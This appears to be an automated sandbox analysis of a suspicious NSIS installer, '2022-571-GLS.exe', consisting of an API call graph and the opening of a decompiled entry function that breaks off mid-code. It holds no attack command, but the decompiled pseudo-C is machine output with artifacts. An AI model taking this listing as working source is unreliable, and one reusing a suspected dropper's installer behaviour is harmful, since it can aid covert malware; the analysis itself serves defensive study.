3919->3920 3921 402a0c 18 API calls 3920->3921 3922 402294 3921->3922 3923 402a0c 18 API calls 3922->3923 3924 40229e GetPrivateProfileStringA 3923->3924 3925 4014fe 3926 401506 3925->3926 3928 401519 3925->3928 3927 4029ef 18 API calls 3926->3927 3927->3928 3936 4040ff 3937 404115 3936->3937 3942 404222 3936->3942 3939 403fb7 19 API calls 3937->3939 3938 404291 3940 404365 3938->3940 3941 40429b GetDlgItem 3938->3941 3943 40416b 3939->3943 3946 40401e 8 API calls 3940->3946 3947 4042b1 3941->3947 3948 404323 3941->3948 3942->3938 3942->3940 3944 404266 GetDlgItem SendMessageA 3942->3944 3945 403fb7 19 API calls 3943->3945 3967 403fd9 EnableWindow 3944->3967 3950 404178 CheckDlgButton 3945->3950 3951 404360 3946->3951 3947->3948 3952 4042d7 6 API calls 3947->3952 3948->3940 3953 404335 3948->3953 3965 403fd9 EnableWindow 3950->3965 3952->3948 3956 40433b SendMessageA 3953->3956 3957 40434c 3953->3957 3954 40428c 3958 40438a SendMessageA 3954->3958 3956->3957 3957->3951 3960 404352 SendMessageA 3957->3960 3958->3938 3959 404196 GetDlgItem 3966 403fec SendMessageA 3959->3966 3960->3951 3962 4041ac SendMessageA 3963 4041d3 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3962->3963 3964 4041ca GetSysColor 3962->3964 3963->3951 3964->3963 3965->3959 3966->3962 3967->3954 3968 401000 3969 401037 BeginPaint GetClientRect 3968->3969 3971 40100c DefWindowProcA 3968->3971 3972 4010f3 3969->3972 3973 401179 3971->3973 3974 401073 CreateBrushIndirect FillRect DeleteObject 3972->3974 3975 4010fc 3972->3975 3974->3972 3976 401102 CreateFontIndirectA 3975->3976 3977 401167 EndPaint 3975->3977 3976->3977 3978 401112 6 API calls 3976->3978 3977->3973 3978->3977 3979 402188 3980 402a0c 18 API calls 3979->3980 3981 40218e 3980->3981 3982 402a0c 18 API calls 3981->3982 3983 402197 3982->3983 3984 402a0c 18 API calls 3983->3984 3985 4021a0 3984->3985 3986 405ff6 2 API calls 3985->3986 3987 4021a9 3986->3987 3988 4021ba lstrlenA lstrlenA 3987->3988 3989 4021ad 3987->3989 3991 404fe7 25 API calls 3988->3991 3990 404fe7 25 API calls 3989->3990 3993 4021b5 3989->3993 3990->3993 3992 4021f6 SHFileOperationA 3991->3992 3992->3989 3992->3993 3142 401389 3144 401390 3142->3144 3143 4013fe 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3994 40220a 3995 402211 3994->3995 3998 402224 3994->3998 3996 405d1d 18 API calls 3995->3996 3997 40221e 3996->3997 3999 4055bc MessageBoxIndirectA 3997->3999 3999->3998 4000 401c8a 4001 4029ef 18 API calls 4000->4001 4002 401c91 4001->4002 4003 4029ef 18 API calls 4002->4003 4004 401c99 GetDlgItem 4003->4004 4005 4024ce 4004->4005 4006 40370c 4007 403717 4006->4007 4008 40371e GlobalAlloc 4007->4008 4009 40371b 4007->4009 4008->4009 4010 401490 4011 404fe7 25 API calls 4010->4011 4012 401497 4011->4012 4013 402611 4014 402618 4013->4014 4016 4028a1 4013->4016 4015 40261e FindClose 4014->4015 4015->4016 4017 402692 4018 402a0c 18 API calls 4017->4018 4020 4026a0 4018->4020 4019 4026b6 4022 4059b3 2 API calls 4019->4022 4020->4019 4021 402a0c 18 API calls 4020->4021 4021->4019 4023 4026bc 4022->4023 4043 4059d2 GetFileAttributesA CreateFileA 4023->4043 4025 4026c9 4026 402772 4025->4026 4027 4026d5 GlobalAlloc 4025->4027 4030 40277a DeleteFileA 4026->4030 4031 40278d 4026->4031 4028 402769 CloseHandle 4027->4028 4029 4026ee 4027->4029 4028->4026 4044 403207 SetFilePointer 4029->4044 4030->4031 4033 4026f4 4034 4031d5 ReadFile 4033->4034 4035 4026fd GlobalAlloc 4034->4035 4036 402741 WriteFile GlobalFree 4035->4036 4037 40270d 4035->4037 4039 402f2e 48 API calls 4036->4039 4038 402f2e 48 API calls 4037->4038 4042 40271a 4038->4042 4040 402766 4039->4040 4040->4028 4041 402738 GlobalFree 4041->4036 4042->4041 4043->4025 4044->4033 4045 401595 4046 402a0c 18 API calls 4045->4046 4047 40159c SetFileAttributesA 4046->4047 4048 4015ae 4047->4048 4049 401e95 4050 402a0c 18 API calls 4049->4050 4051 401e9c 4050->4051 4052 405ff6 2 API calls 4051->4052 4053 401ea2 4052->4053 4055 401eb4 4053->4055 4056 405c59 wsprintfA 4053->4056 4056->4055 4057 401696 4058 402a0c 18 API calls 4057->4058 4059 40169c GetFullPathNameA 4058->4059 4060 4016b3 4059->4060 4066 4016d4 4059->4066 4063 405ff6 2 API calls 4060->4063 4060->4066 4061 4028a1 4062 4016e8 GetShortPathNameA 4062->4061 4064 4016c4 4063->4064 4064->4066 4067 405cfb lstrcpynA 4064->4067 4066->4061 4066->4062 4067->4066 4075 402319 4076 40231f 4075->4076 4077 402a0c 18 API calls 4076->4077 4078 402331 4077->4078 4079 402a0c 18 API calls 4078->4079 4080 40233b RegCreateKeyExA 4079->4080 4081 4028a1 4080->4081 4082 402365 4080->4082 4083 40237d 4082->4083 4084 402a0c 18 API calls 4082->4084 4085 402389 4083->4085 4087 4029ef 18 API calls 4083->4087 4086 402376 lstrlenA 4084->4086 4088 4023a4 RegSetValueExA 4085->4088 4089 402f2e 48 API calls 4085->4089 4086->4083 4087->4085 4090 4023ba RegCloseKey 4088->4090 4089->4088 4090->4081 4092 402819 4093 4029ef 18 API calls 4092->4093 4094 40281f 4093->4094 4095 402672 4094->4095 4096 402850 4094->4096 4097 40282d 4094->4097 4096->4095 4098 405d1d 18 API calls 4096->4098 4097->4095 4100 405c59 wsprintfA 4097->4100 4098->4095 4100->4095 3146 401e1b 3147 402a0c 18 API calls 3146->3147 3148 401e21 3147->3148 3149 404fe7 25 API calls 3148->3149 3150 401e2b 3149->3150 3162 40555b CreateProcessA 3150->3162 3152 402672 3153 401e87 CloseHandle 3153->3152 3154 401e50 WaitForSingleObject 3155 401e31 3154->3155 3156 401e5e GetExitCodeProcess 3154->3156 3155->3152 3155->3153 3155->3154 3159 4060c3 2 API calls 3155->3159 3157 401e70 3156->3157 3158 401e7b 3156->3158 3165 405c59 wsprintfA 3157->3165 3158->3153 3161 401e79 3158->3161 3159->3154 3161->3153 3163 405596 3162->3163 3164 40558a CloseHandle 3162->3164 3163->3155 3164->3163 3165->3161 4101 401d1b GetDC GetDeviceCaps 4102 4029ef 18 API calls 4101->4102 4103 401d37 MulDiv 4102->4103 4104 4029ef 18 API calls 4103->4104 4105 401d4c 4104->4105 4106 405d1d 18 API calls 4105->4106 4107 401d85 CreateFontIndirectA 4106->4107 4108 4024ce 4107->4108 4108->4108 4109 40251c 4110 4029ef 18 API calls 4109->4110 4111 402526 4110->4111 4112 40255a ReadFile 4111->4112 4113 40259e 4111->4113 4115 4025ae 4111->4115 4117 40259c 4111->4117 4112->4111 4112->4117 4118 405c59 wsprintfA 4113->4118 4116 4025c4 SetFilePointer 4115->4116 4115->4117 4116->4117 4118->4117 2933 401721 2939 402a0c 2933->2939 2937 40172f 2938 405a01 2 API calls 2937->2938 2938->2937 2940 402a18 2939->2940 2949 405d1d 2940->2949 2943 401728 2945 405a01 2943->2945 2946 405a0c GetTickCount GetTempFileNameA 2945->2946 2947 405a3c 2946->2947 2948 405a38 2946->2948 2947->2937 2948->2946 2948->2947 2959 405d2a 2949->2959 2950 405f44 2951 402a39 2950->2951 2984 405cfb lstrcpynA 2950->2984 2951->2943 2968 405f5d 2951->2968 2953 405dc2 GetVersion 2954 405dcf 2953->2954 2954->2959 2961 405e3a GetSystemDirectoryA 2954->2961 2962 405e4d GetWindowsDirectoryA 2954->2962 2964 405d1d 10 API calls 2954->2964 2965 405ec4 lstrcatA 2954->2965 2966 405e81 SHGetSpecialFolderLocation 2954->2966 2977 405be2 RegOpenKeyExA 2954->2977 2955 405f1b lstrlenA 2955->2959 2958 405d1d 10 API calls 2958->2955 2959->2950 2959->2953 2959->2955 2959->2958 2963 405f5d 5 API calls 2959->2963 2982 405c59 wsprintfA 2959->2982 2983 405cfb lstrcpynA 2959->2983 2961->2954 2962->2954 2963->2959 2964->2954 2965->2959 2966->2954 2967 405e99 SHGetPathFromIDListA CoTaskMemFree 2966->2967 2967->2954 2974 405f69 2968->2974 2969 405fd1 2970 405fd5 CharPrevA 2969->2970 2973 405ff0 2969->2973 2970->2969 2971 405fc6 CharNextA 2971->2969 2971->2974 2973->2943 2974->2969 2974->2971 2975 405fb4 CharNextA 2974->2975 2976 405fc1 CharNextA 2974->2976 2985 405819 2974->2985 2975->2974 2976->2971 2978 405c53 2977->2978 2979 405c15 RegQueryValueExA 2977->2979 2978->2954 2980 405c36 RegCloseKey 2979->2980 2980->2978 2982->2959 2983->2959 2984->2951 2986 40581f 2985->2986 2987 405832 2986->2987 2988 405825 CharNextA 2986->2988 2987->2974 2988->2986 4119 401922 4120 402a0c 18 API calls 4119->4120 4121 401929 lstrlenA 4120->4121 4122 4024ce 4121->4122 4123 405125 4124 4052d1 4123->4124 4125 405146 GetDlgItem GetDlgItem GetDlgItem 4123->4125 4127 405302 4124->4127 4128 4052da GetDlgItem CreateThread CloseHandle 4124->4128 4169 403fec SendMessageA 4125->4169 4130 40532d 4127->4130 4131 405319 ShowWindow ShowWindow 4127->4131 4132 40534f 4127->4132 4128->4127 4129 4051b7 4135 4051be GetClientRect GetSystemMetrics SendMessageA SendMessageA 4129->4135 4133 40538b 4130->4133 4137 405364 ShowWindow 4130->4137 4138 40533e 4130->4138 4171 403fec SendMessageA 4131->4171 4134 40401e 8 API calls 4132->4134 4133->4132 4143 405396 SendMessageA 4133->4143 4149 40535d 4134->4149 4141 405211 SendMessageA SendMessageA 4135->4141 4142 40522d 4135->4142 4139 405384 4137->4139 4140 405376 4137->4140 4144 403f90 SendMessageA 4138->4144 4146 403f90 SendMessageA 4139->4146 4145 404fe7 25 API calls 4140->4145 4141->4142 4147 405240 4142->4147 4148 405232 SendMessageA 4142->4148 4143->4149 4150 4053af CreatePopupMenu 4143->4150 4144->4132 4145->4139 4146->4133 4152 403fb7 19 API calls 4147->4152 4148->4147 4151 405d1d 18 API calls 4150->4151 4153 4053bf AppendMenuA 4151->4153 4154 405250 4152->4154 4155 4053d2 GetWindowRect 4153->4155 4156 4053e5 4153->4156 4157 405259 ShowWindow 4154->4157 4158 40528d GetDlgItem SendMessageA 4154->4158 4159 4053ee TrackPopupMenu 4155->4159 4156->4159 4160 40527c 4157->4160 4161 40526f ShowWindow 4157->4161 4158->4149 4162 4052b4 SendMessageA SendMessageA 4158->4162 4159->4149 4163 40540c 4159->4163 4170 403fec SendMessageA 4160->4170 4161->4160 4162->4149 4164 405428 SendMessageA 4163->4164 4164->4164 4166 405445 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4164->4166 4167 405467 SendMessageA 4166->4167 4167->4167 4168 405488 GlobalUnlock SetClipboardData CloseClipboard 4167->4168 4168->4149 4169->4129 4170->4158 4171->4130 4172 401ca5 4173 4029ef 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 4028a1 4174->4175 4176 401a26 4177 4029ef 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029ef 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 406a26 4184 4061b7 4181->4184 4182 406241 GlobalAlloc 4182->4184 4185 406b22 4182->4185 4183 406238 GlobalFree 4183->4182 4184->4182 4184->4183 4184->4184 4184->4185 4186 4062b8 GlobalAlloc 4184->4186 4187 4062af GlobalFree 4184->4187 4186->4184 4186->4185 4187->4186 4188 40262b 4189 402646 4188->4189 4190 40262e 4188->4190 4191 4027cc 4189->4191 4194 405cfb lstrcpynA 4189->4194 4192 40263b FindNextFileA 4190->4192 4192->4189 4194->4191 4195 401bad 4196 4029ef 18 API calls 4195->4196 4197 401bb4 4196->4197 4198 4029ef 18 API calls 4197->4198 4199 401bbe 4198->4199 4200 401bce 4199->4200 4201 402a0c 18 API calls 4199->4201 4202 401bde 4200->4202 4203 402a0c 18 API calls 4200->4203 4201->4200 4204 401be9 4202->4204 4205 401c2d 4202->4205 4203->4202 4207 4029ef 18 API calls 4204->4207 4206 402a0c 18 API calls 4205->4206 4209 401c32 4206->4209 4208 401bee 4207->4208 4210 4029ef 18 API calls 4208->4210 4211 402a0c 18 API calls 4209->4211 4212 401bf7 4210->4212 4213 401c3b FindWindowExA 4211->4213 4214 401c1d SendMessageA 4212->4214 4215 401bff SendMessageTimeoutA 4212->4215 4216 401c59 4213->4216 4214->4216 4215->4216 4217 4043ae 4218 4043e4 4217->4218 4219 4043be 4217->4219 4221 40401e 8 API calls 4218->4221 4220 403fb7 19 API calls 4219->4220 4222 4043cb SetDlgItemTextA 4220->4222 4223 4043f0 4221->4223 4222->4218 4224 4024b2 4225 402a0c 18 API calls 4224->4225 4226 4024b9 4225->4226 4229 4059d2 GetFileAttributesA CreateFileA 4226->4229 4228 4024c5 4229->4228 2989 4015b3 2990 402a0c 18 API calls 2989->2990 2991 4015ba 2990->2991 3007 405882 CharNextA CharNextA 2991->3007 2993 4015c2 2994 40160a 2993->2994 2995 405819 CharNextA 2993->2995 2996 40162d 2994->2996 2997 40160f 2994->2997 2998 4015d0 CreateDirectoryA 2995->2998 3001 401423 25 API calls 2996->3001 3013 401423 2997->3013 2998->2993 3000 4015e5 GetLastError 2998->3000 3000->2993 3003 4015f2 GetFileAttributesA 3000->3003 3006 40217f 3001->3006 3003->2993 3005 401621 SetCurrentDirectoryA 3005->3006 3008 4058a8 3007->3008 3009 40589c 3007->3009 3011 405819 CharNextA 3008->3011 3012 4058c5 3008->3012 3009->3008 3010 4058a3 CharNextA 3009->3010 3010->3012 3011->3008 3012->2993 3017 404fe7 3013->3017 3016 405cfb lstrcpynA 3016->3005 3018 401431 3017->3018 3019 405002 3017->3019 3018->3016 3020 40501f lstrlenA 3019->3020 3021 405d1d 18 API calls 3019->3021 3022 405048 3020->3022 3023 40502d lstrlenA 3020->3023 3021->3020 3025 40505b 3022->3025 3026 40504e SetWindowTextA 3022->3026 3023->3018 3024 40503f lstrcatA 3023->3024 3024->3022 3025->3018 3027 405061 SendMessageA SendMessageA SendMessageA 3025->3027 3026->3025 3027->3018 4230 406333 4232 4061b7 4230->4232 4231 406b22 4232->4231 4233 406241 GlobalAlloc 4232->4233 4234 406238 GlobalFree 4232->4234 4235 4062b8 GlobalAlloc 4232->4235 4236 4062af GlobalFree 4232->4236 4233->4231 4233->4232 4234->4233 4235->4231 4235->4232 4236->4235 3028 401734 3029 402a0c 18 API calls 3028->3029 3030 40173b 3029->3030 3031 401761 3030->3031 3032 401759 3030->3032 3083 405cfb lstrcpynA 3031->3083 3082 405cfb lstrcpynA 3032->3082 3035 40175f 3039 405f5d 5 API calls 3035->3039 3036 40176c 3084 4057ee lstrlenA CharPrevA 3036->3084 3058 40177e 3039->3058 3043 401795 CompareFileTime 3043->3058 3044 401859 3045 404fe7 25 API calls 3044->3045 3048 401863 3045->3048 3046 404fe7 25 API calls 3054 401845 3046->3054 3047 405cfb lstrcpynA 3047->3058 3067 402f2e 3048->3067 3051 40188a SetFileTime 3052 40189c FindCloseChangeNotification 3051->3052 3052->3054 3055 4018ad 3052->3055 3053 405d1d 18 API calls 3053->3058 3056 4018b2 3055->3056 3057 4018c5 3055->3057 3059 405d1d 18 API calls 3056->3059 3060 405d1d 18 API calls 3057->3060 3058->3043 3058->3044 3058->3047 3058->3053 3065 401830 3058->3065 3066 4059d2 GetFileAttributesA CreateFileA 3058->3066 3087 405ff6 FindFirstFileA 3058->3087 3090 4059b3 GetFileAttributesA 3058->3090 3093 4055bc 3058->3093 3062 4018ba lstrcatA 3059->3062 3063 4018cd 3060->3063 3062->3063 3064 4055bc MessageBoxIndirectA 3063->3064 3064->3054 3065->3046 3065->3054 3066->3058 3068 402f5b 3067->3068 3069 402f3f SetFilePointer 3067->3069 3097 403059 GetTickCount 3068->3097 3069->3068 3072 402f6c ReadFile 3073 402f8c 3072->3073 3081 401876 3072->3081 3074 403059 43 API calls 3073->3074 3073->3081 3075 402fa3 3074->3075 3076 40301e ReadFile 3075->3076 3079 402fb3 3075->3079 3075->3081 3076->3081 3078 402fce ReadFile 3078->3079 3078->3081 3079->3078 3080 402fe7 WriteFile 3079->3080 3079->3081 3080->3079 3080->3081 3081->3051 3081->3052 3082->3035 3083->3036 3085 401772 lstrcatA 3084->3085 3086 405808 lstrcatA 3084->3086 3085->3035 3086->3085 3088 406017 3087->3088 3089 40600c FindClose 3087->3089 3088->3058 3089->3088 3091 4059c2 SetFileAttributesA 3090->3091 3092 4059cf 3090->3092 3091->3092 3092->3058 3096 4055d1 3093->3096 3094 40561d 3094->3058 3095 4055e5 MessageBoxIndirectA 3095->3094 3096->3094 3096->3095 3098 4031c3 3097->3098 3099 403088 3097->3099 3100 402be9 33 API calls 3098->3100 3110 403207 SetFilePointer 3099->3110 3107 402f64 3100->3107 3102 403093 SetFilePointer 3106 4030b8 3102->3106 3106->3107 3108 40314d WriteFile 3106->3108 3109 4031a4 SetFilePointer 3106->3109 3111 4031d5 ReadFile 3106->3111 3113 406184 3106->3113 3120 402be9 3106->3120 3107->3072 3107->3081 3108->3106 3108->3107 3109->3098 3110->3102 3112 4031f6 3111->3112 3112->3106 3114 4061a9 3113->3114 3115 4061b1 3113->3115 3114->3106 3115->3114 3116 406241 GlobalAlloc 3115->3116 3117 406238 GlobalFree 3115->3117 3118 4062b8 GlobalAlloc 3115->3118 3119 4062af GlobalFree 3115->3119 3116->3114 3116->3115 3117->3116 3118->3114 3118->3115 3119->3118 3121 402bf7 3120->3121 3122 402c0f 3120->3122 3123 402c00 DestroyWindow 3121->3123 3124 402c07 3121->3124 3125 402c17 3122->3125 3126 402c1f GetTickCount 3122->3126 3123->3124 3124->3106 3135 4060c3 3125->3135 3126->3124 3128 402c2d 3126->3128 3129 402c62 CreateDialogParamA ShowWindow 3128->3129 3130 402c35 3128->3130 3129->3124 3130->3124 3139 402bcd 3130->3139 3132 402c43 wsprintfA 3133 404fe7 25 API calls 3132->3133 3134 402c60 3133->3134 3134->3124 3136 4060e0 PeekMessageA 3135->3136 3137 4060f0 3136->3137 3138 4060d6 DispatchMessageA 3136->3138 3137->3124 3138->3136 3140 402bdc 3139->3140 3141 402bde MulDiv 3139->3141 3140->3141 3141->3132 4237 401634 4238 402a0c 18 API calls 4237->4238 4239 40163a 4238->4239 4240 405ff6 2 API calls 4239->4240 4241 401640 4240->4241 4242 401934 4243 4029ef 18 API calls 4242->4243 4244 40193b 4243->4244 4245 4029ef 18 API calls 4244->4245 4246 401945 4245->4246 4247 402a0c 18 API calls 4246->4247 4248 40194e 4247->4248 4249 401961 lstrlenA 4248->4249 4253 40199c 4248->4253 4250 40196b 4249->4250 4250->4253 4255 405cfb lstrcpynA 4250->4255 4252 401985 4252->4253 4254 401992 lstrlenA 4252->4254 4254->4253 4255->4252 4256 4019b5 4257 402a0c 18 API calls 4256->4257 4258 4019bc 4257->4258 4259 402a0c 18 API calls 4258->4259 4260 4019c5 4259->4260 4261 4019cc lstrcmpiA 4260->4261 4262 4019de lstrcmpA 4260->4262 4263 4019d2 4261->4263 4262->4263 4264 404936 GetDlgItem GetDlgItem 4265 40498a 7 API calls 4264->4265 4268 404ba7 4264->4268 4266 404a30 DeleteObject 4265->4266 4267 404a23 SendMessageA 4265->4267 4269 404a3b 4266->4269 4267->4266 4287 404c91 4268->4287 4296 404c1b 4268->4296 4317 4048b6 SendMessageA 4268->4317 4270 404a72 4269->4270 4271 405d1d 18 API calls 4269->4271 4272 403fb7 19 API calls 4270->4272 4275 404a54 SendMessageA SendMessageA 4271->4275 4278 404a86 4272->4278 4273 404d40 4276 404d55 4273->4276 4277 404d49 SendMessageA 4273->4277 4274 404b9a 4280 40401e 8 API calls 4274->4280 4275->4269 4288 404d67 ImageList_Destroy 4276->4288 4289 404d6e 4276->4289 4293 404d7e 4276->4293 4277->4276 4283 403fb7 19 API calls 4278->4283 4279 404cea SendMessageA 4279->4274 4285 404cff SendMessageA 4279->4285 4286 404f30 4280->4286 4281 404c83 SendMessageA 4281->4287 4297 404a94 4283->4297 4284 404ee4 4284->4274 4294 404ef6 ShowWindow GetDlgItem ShowWindow 4284->4294 4291 404d12 4285->4291 4287->4273 4287->4274 4287->4279 4288->4289 4292 404d77 GlobalFree 4289->4292 4289->4293 4290 404b68 GetWindowLongA SetWindowLongA 4295 404b81 4290->4295 4302 404d23 SendMessageA 4291->4302 4292->4293 4293->4284 4301 40140b 2 API calls 4293->4301 4310 404db0 4293->4310 4294->4274 4298 404b87 ShowWindow 4295->4298 4299 404b9f 4295->4299 4296->4281 4296->4287 4297->4290 4300 404ae3 SendMessageA 4297->4300 4303 404b62 4297->4303 4306 404b30 SendMessageA 4297->4306 4307 404b1f SendMessageA 4297->4307 4315 403fec SendMessageA 4298->4315 4316 403fec SendMessageA 4299->4316 4300->4297 4301->4310 4302->4273 4303->4290 4303->4295 4306->4297 4307->4297 4308 404eba InvalidateRect 4308->4284 4309 404ed0 4308->4309 4313 404871 21 API calls 4309->4313 4311 404dde SendMessageA 4310->4311 4312 404df4 4310->4312 4311->4312 4312->4308 4314 404e68 SendMessageA SendMessageA 4312->4314 4313->4284 4314->4312 4315->4274 4316->4268 4318 404915 SendMessageA 4317->4318 4319 4048d9 GetMessagePos ScreenToClient SendMessageA 4317->4319 4321 40490d 4318->4321 4320 404912 4319->4320 4319->4321 4320->4318 4321->4296 4322 402036 4323 402a0c 18 API calls 4322->4323 4324 40203d 4323->4324 4325 402a0c 18 API calls 4324->4325 4326 402047 4325->4326 4327 402a0c 18 API calls 4326->4327 4328 402050 4327->4328 4329 402a0c 18 API calls 4328->4329 4330 40205a 4329->4330 4331 402a0c 18 API calls 4330->4331 4332 402064 4331->4332 4333 402078 CoCreateInstance 4332->4333 4334 402a0c 18 API calls 4332->4334 4335 40214d 4333->4335 4336 402097 4333->4336 4334->4333 4337 401423 25 API calls 4335->4337 4338 40217f 4335->4338 4336->4335 4339 40212c MultiByteToWideChar 4336->4339 4337->4338 4339->4335 4340 404f37 4341 404f45 4340->4341 4342 404f5c 4340->4342 4343 404f4b 4341->4343 4358 404fc5 4341->4358 4344 404f6a IsWindowVisible 4342->4344 4350 404f81 4342->4350 4345 404003 SendMessageA 4343->4345 4347 404f77 4344->4347 4344->4358 4348 404f55 4345->4348 4346 404fcb CallWindowProcA 4346->4348 4349 4048b6 5 API calls 4347->4349 4349->4350 4350->4346 4359 405cfb lstrcpynA 4350->4359 4352 404fb0 4360 405c59 wsprintfA 4352->4360 4354 404fb7 4355 40140b 2 API calls 4354->4355 4356 404fbe 4355->4356 4361 405cfb lstrcpynA 4356->4361 4358->4346 4359->4352 4360->4354 4361->4358 4362 4014b7 4363 4014bd 4362->4363 4364 401389 2 API calls 4363->4364 4365 4014c5 4364->4365 4366 402239 4367 402241 4366->4367 4368 402247 4366->4368 4369 402a0c 18 API calls 4367->4369 4370 402a0c 18 API calls 4368->4370 4372 402257 4368->4372 4369->4368 4370->4372 4371 402265 4374 402a0c 18 API calls 4371->4374 4372->4371 4373 402a0c 18 API calls 4372->4373 4373->4371 4375 40226e WritePrivateProfileStringA 4374->4375 4383 40243d 4384 402b16 19 API calls 4383->4384 4385 402447 4384->4385 4386 4029ef 18 API calls 4385->4386 4387 402450 4386->4387 4388 402473 RegEnumValueA 4387->4388 4389 402467 RegEnumKeyA 4387->4389 4391 402672 4387->4391 4390 40248c RegCloseKey 4388->4390 4388->4391 4389->4390 4390->4391 4393 4022bd 4394 4022c2 4393->4394 4395 4022ed 4393->4395 4396 402b16 19 API calls 4394->4396 4397 402a0c 18 API calls 4395->4397 4398 4022c9 4396->4398 4399 4022f4 4397->4399 4400 402a0c 18 API calls 4398->4400 4403 40230a 4398->4403 4404 402a4c RegOpenKeyExA 4399->4404 4401 4022da RegDeleteValueA RegCloseKey 4400->4401 4401->4403 4405 402a77 4404->4405 4411 402ac3 4404->4411 4406 402a9d RegEnumKeyA 4405->4406 4407 402aaf RegCloseKey 4405->4407 4409 402ad4 RegCloseKey 4405->4409 4412 402a4c 5 API calls 4405->4412 4406->4405 4406->4407 4408 406087 5 API calls 4407->4408 4410 402abf 4408->4410 4409->4411 4410->4411 4413 402aef RegDeleteKeyA 4410->4413 4411->4403 4412->4405 4413->4411

                          Executed Functions

                          Function 0040324F Relevance: 86.1, APIs: 26, Strings: 23, Instructions: 313stringfilecomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 40324f-403283 SetErrorMode GetVersion 1 403285-40328d call 406087 0->1 2 403296-403326 call 40601d * 3 call 406087 * 2 #17 OleInitialize SHGetFileInfoA call 405cfb GetCommandLineA call 405cfb GetModuleHandleA 0->2 1->2 8 40328f 1->8 20 403332-403347 call 405819 CharNextA 2->20 21 403328-40332d 2->21 8->2 24 4033ac-4033b0 20->24 21->20 25 4033b2 24->25 26 403349-40334c 24->26 29 4033c5-4033dd GetTempPathA call 40321e 25->29 27 403354-40335c 26->27 28 40334e-403352 26->28 30 403364-403367 27->30 31 40335e-40335f 27->31 28->27 28->28 38 4033ff-403416 DeleteFileA call 402c88 29->38 39 4033df-4033fd GetWindowsDirectoryA lstrcatA call 40321e 29->39 33 403369-40336d 30->33 34 40339c-4033a9 call 405819 30->34 31->30 36 40337d-403383 33->36 37 40336f-403378 33->37 34->24 51 4033ab 34->51 43 403393-40339a 36->43 44 403385-40338e 36->44 37->36 41 40337a 37->41 53 40347d-40348c ExitProcess OleUninitialize 38->53 54 403418-40341e 38->54 39->38 39->53 41->36 43->34 49 4033b4-4033c0 call 405cfb 43->49 44->43 48 403390 44->48 48->43 49->29 51->24 55 4035a1-4035a7 53->55 56 403492-4034a2 call 4055bc ExitProcess 53->56 57 403420-403429 call 405819 54->57 58 40346d-403474 call 40374e 54->58 60 403644-40364c 55->60 61 4035ad-4035ca call 406087 * 3 55->61 70 403434-403436 57->70 69 403479 58->69 64 403652-403656 ExitProcess 60->64 65 40364e 60->65 88 403614-403622 call 406087 61->88 89 4035cc-4035ce 61->89 65->64 69->53 72 403438-403442 70->72 73 40342b-403431 70->73 76 403444-403451 call 4058cf 72->76 77 4034a8-4034bc call 405543 lstrcatA 72->77 73->72 75 403433 73->75 75->70 76->53 87 403453-403469 call 405cfb * 2 76->87 85 4034c9-4034e3 lstrcatA lstrcmpiA 77->85 86 4034be-4034c4 lstrcatA 77->86 85->53 91 4034e5-4034e8 85->91 86->85 87->58 99 403630-40363b ExitWindowsEx 88->99 100 403624-40362e 88->100 89->88 93 4035d0-4035d2 89->93 95 4034f1 call 405526 91->95 96 4034ea-4034ef call 4054a9 91->96 93->88 98 4035d4-4035e6 GetCurrentProcess 93->98 108 4034f6-403503 SetCurrentDirectoryA 95->108 96->108 98->88 111 4035e8-40360a 98->111 99->60 107 40363d-40363f call 40140b 99->107 100->99 100->107 107->60 109 403510-40352a call 405cfb 108->109 110 403505-40350b call 405cfb 108->110 118 40352f-40354b call 405d1d DeleteFileA 109->118 110->109 111->88 121 40358c-403593 118->121 122 40354d-40355d CopyFileA 118->122 121->118 123 403595-40359c call 405a49 121->123 122->121 124 40355f-40357f call 405a49 call 405d1d call 40555b 122->124 123->53 124->121 133 403581-403588 CloseHandle 124->133 133->121
                          C-Code - Quality: 77%
                          			_entry_() {
				intOrPtr _t40;
				CHAR* _t44;
				char* _t47;
				signed int _t49;
				void* _t53;
				intOrPtr _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				int _t61;
				signed int _t63;
				signed int _t66;
				intOrPtr _t79;
				int _t83;
				intOrPtr _t85;
				void* _t87;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				CHAR* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t115;
				char* _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				intOrPtr _t129;
				char _t138;

				 *(_t121 + 0x1c) = 0;
				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				_t110 = 0;
				 *(_t121 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t100 = E00406087(0);
					if(_t100 != 0) {
						 *_t100(0xc00);
					}
				}
				E0040601D("UXTHEME"); // executed
				E0040601D("USERENV"); // executed
				E0040601D("SETUPAPI"); // executed
				E00406087(0xd);
				_t40 = E00406087(0xb);
				 *0x423f84 = _t40;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x424038 = _t40;
				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
				E00405CFB("djvgroedvnqvwkorzqvn Setup", "NSIS Error");
				_t44 = GetCommandLineA();
				_t117 = "\"C:\\Users\\jones\\Desktop\\2022-571-GLS.exe\"";
				E00405CFB(_t117, _t44);
				 *0x423f80 = GetModuleHandleA(0);
				_t47 = _t117;
				if("\"C:\\Users\\jones\\Desktop\\2022-571-GLS.exe\"" == 0x22) {
					 *((char*)(_t121 + 0x14)) = 0x22;
					_t47 =  &M0042A001;
				}
				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
				 *(_t121 + 0x1c) = _t49;
				while(1) {
					_t103 =  *_t49;
					_t125 = _t103;
					if(_t103 == 0) {
						break;
					}
					__eflags = _t103 - 0x20;
					if(_t103 != 0x20) {
						L8:
						__eflags =  *_t49 - 0x22;
						 *((char*)(_t121 + 0x14)) = 0x20;
						if( *_t49 == 0x22) {
							_t49 = _t49 + 1;
							__eflags = _t49;
							 *((char*)(_t121 + 0x14)) = 0x22;
						}
						__eflags =  *_t49 - 0x2f;
